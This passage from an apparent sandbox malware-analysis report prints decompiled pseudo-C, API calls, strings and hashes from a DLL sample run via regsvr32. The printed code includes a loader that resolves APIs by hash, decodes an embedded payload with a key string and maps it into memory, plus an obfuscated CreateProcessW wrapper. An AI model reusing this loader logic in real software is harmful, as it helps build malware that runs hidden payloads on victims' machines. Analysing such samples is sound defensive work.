											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x10002906
0x10002909
0x10002910
0x10002927
0x10002933
0x10002941
0x10002958
0x10002970
0x1000297f
0x10002982
0x1000298e
0x100029af
0x100029cc
0x100029ee
0x100029f7
0x100029fa
0x10002a15
0x10002a28
0x10002a44
0x10002a2a
0x10002a33
0x10002a33
0x10002a4d
0x10002a52
0x10002a52
0x10002a09
0x10002a12
0x10002a12
0x10002a5b
0x10002a78
0x10002a81
0x10002a92
0x10002ab8
0x10002abe
0x10002ac5
0x10002af2
0x10002b03
0x10002b0a
0x10002b32
0x10002b44
0x10002b4b
0x10002b54
0x10002b5d
0x10002b66
0x10002b6f
0x10002b78
0x10002b90
0x10002bae
0x10002bb4
0x10002bc6
0x10002bd4
0x10002bda
0x10002be4
0x10002bfa
0x10002c01
0x10002c18
0x10002c1b
0x10002c1e
0x10002c3b
0x10002c20
0x10002c33
0x10002c33
0x10002c50
0x10002c63
0x10002c6a
0x10002c84
0x10002c96
0x10002d00
0x10002d07
0x00000000
0x10002d07
0x10002c9f
0x10002cf8
0x10002cfb
0x00000000
0x10002cfb
0x10002cac
0x10002caf
0x10002cb5
0x10002cbc
0x10002cc6
0x10002ccd
0x10002ce1
0x00000000
0x10002ce1
0x10002cd4
0x10002d0c
0x10002d13
0x00000000
0x10002d18
0x00000000
0x10002c86
0x00000000
0x10002c6c
0x00000000
0x10002c52
0x00000000
0x10002c03
0x00000000
0x10002b92
0x10002b17
0x10002b1f
0x00000000
0x10002b25
0x10002ad4
0x10002ada
0x10002ae1
0x00000000
0x00000000
0x10002ae5
0x00000000
0x10002aeb
0x10002a99
0x00000000
0x10002a9f
0x100029d3
0x00000000
0x100029d9
0x100029b6
0x00000000
0x100029bc
0x10002995
0x00000000
0x1000299b
0x00000000
0x10002972
0x10002948
0x00000000
0x1000294e
0x00000000

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

0x100088e0
0x100088e0
0x100088e0
0x100088e9
0x100088ef
0x100088f5
0x100088f8
0x10008901
0x10008906
0x1000890d
0x10008914
0x1000891b
0x10008922
0x10008929
0x10008930
0x10008966
0x1000896b
0x00000000
0x10008973
0x10008932
0x1000893c
0x10008946
0x10008950
0x1000895a
0x1000897a
0x10008981
0x10008988
0x1000898f
0x10008996
0x1000899d
0x100089a4
0x100089b8
0x100089c8
0x100089dc
0x100089f2
0x100089f7
0x100089fe
0x10008a3b
0x10008a51
0x10008a51
0x10008a63
0x10008a00
0x10008a2b
0x10008a31
0x10008a31
0x10008a73
0x10008a7b
0x10008a8a
0x10008a98
0x10008aac
0x10008ac1
0x10008ac6
0x10008ad1
0x00000000

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

8192, xrefs: 10008A10, 10008A44
+';, xrefs: 10008988
`/, xrefs: 1000898F
ntdll.dll, xrefs: 100089BB
vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F
kernel32.dll, xrefs: 100089AB

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x32b48a8
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x32b48a8
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x32b48a8
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x32b48a8
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x32b48a8
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x10013a9b
0x10013a9c
0x10013a9d
0x10013a9f
0x10013aa1
0x10013aa1
0x10013aa6
0x10013aaa
0x10013ab0
0x10013ab0
0x10013ab3
0x10013ab3
0x10013ab8
0x10013ac7
0x10013ac9
0x10013aca
0x10013acc
0x10013ae9
0x10013ae9
0x10013ae9
0x10013aec
0x10013aec
0x10013aef
0x10013af1
0x10013b0f
0x10013b12
0x10013b20
0x10013b26
0x10013b29
0x10013af3
0x10013af6
0x10013afc
0x10013b00
0x10013b00
0x10013b2f
0x10013b31
0x10013b5e
0x10013b60
0x10013b67
0x10013b71
0x10013b79
0x10013b7c
0x00000000
0x10013b33
0x10013b33
0x10013b33
0x10013b36
0x10013b38
0x10013b42
0x10013b42
0x10013b4c
0x1000a0a7
0x1000a0a8
0x1000a0aa
0x1000a0b4
0x1000a0bb
0x1000a0c0
0x1000a0c1
0x1000a0c2
0x1000a0c4
0x1000a0ce
0x1000a0d5
0x1000a0da
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x10013ace
0x10013ace
0x10013ad1
0x10013ad1
0x10013ad4
0x10013ad4
0x10013ad7
0x00000000
0x00000000
0x10013ad9
0x10013ada
0x10013add
0x10013adf
0x00000000
0x00000000
0x00000000
0x10013adf
0x10013ae1
0x10013ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x10013ae3
0x10013aba
0x10013aba
0x10013aba
0x10013abd
0x10013ac1
0x10013b7f
0x10013b7f
0x10013b7f
0x10013b82
0x10013b84
0x10013b87
0x10013b87
0x10013b8a
0x10013b91
0x10013b94
0x10013b94
0x10013b97
0x10013b9a
0x10013b9d
0x10013baa
0x00000000
0x00000000
0x00000000
0x10013ac1

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32 ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 10013B29
GlobalHandle.KERNEL32 ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x10016380
0x10016382
0x10016387
0x1001638c
0x10016391
0x10016408
0x1001640d
0x1001640d
0x1001639a
0x100163df
0x100163e0
0x100163e0
0x100163e8
0x100163ee
0x100163f0
0x100163f2
0x10016405
0x10016407
0x00000000
0x100163f0
0x1001639e
0x100163a4
0x100163a9
0x100163af
0x100163b4
0x100163b6
0x100163b7
0x100163b8
0x100163be
0x100163bf
0x100163c6
0x100163cf
0x00000000
0x100163d1
0x100163d1
0x00000000
0x100163d1

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 04B52C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E04B52C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04B4FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				L04B3EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x04b52c2c
0x04b52c31
0x04b52c33
0x04b52c36
0x04b52c37
0x04b52c3a
0x04b52c3d
0x04b52c3e
0x04b52c41
0x04b52c44
0x04b52c47
0x04b52c4a
0x04b52c4b
0x04b52c4e
0x04b52c4f
0x04b52c51
0x04b52c52
0x04b52c57
0x04b52c61
0x04b52c64
0x04b52c67
0x04b52c6e
0x04b52c72
0x04b52c76
0x04b52c7d
0x04b52c84
0x04b52c8b
0x04b52c92
0x04b52c99
0x04b52ca0
0x04b52ca4
0x04b52cab
0x04b52cb2
0x04b52cb9
0x04b52cc0
0x04b52cc7
0x04b52ce8
0x04b52d02
0x04b52d09

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04B52D02

Strings

3HS, xrefs: 04B52C57

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 316d9a6cb61646719c535dc277538119bbac8d7b6d534aee4a41a1bf137d06ba
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 2721F372800248BBCF159F96DC0ACDFBFB9EF85704F108189F915A2220D3B59A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

0x100021d6
0x100021e0
0x100021f8
0x10002262
0x10002266
0x10002276
0x1000227a
0x1000228b
0x1000228f
0x1000229b
0x100022a8
0x100022b6
0x100022c1
0x100022c1
0x100022d9
0x100022e1
0x00000000
0x100022e3
0x00000000
0x100022e3
0x100022e1
0x10002205
0x10002244
0x10002244
0x00000000
0x1000224a
0x00000000

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
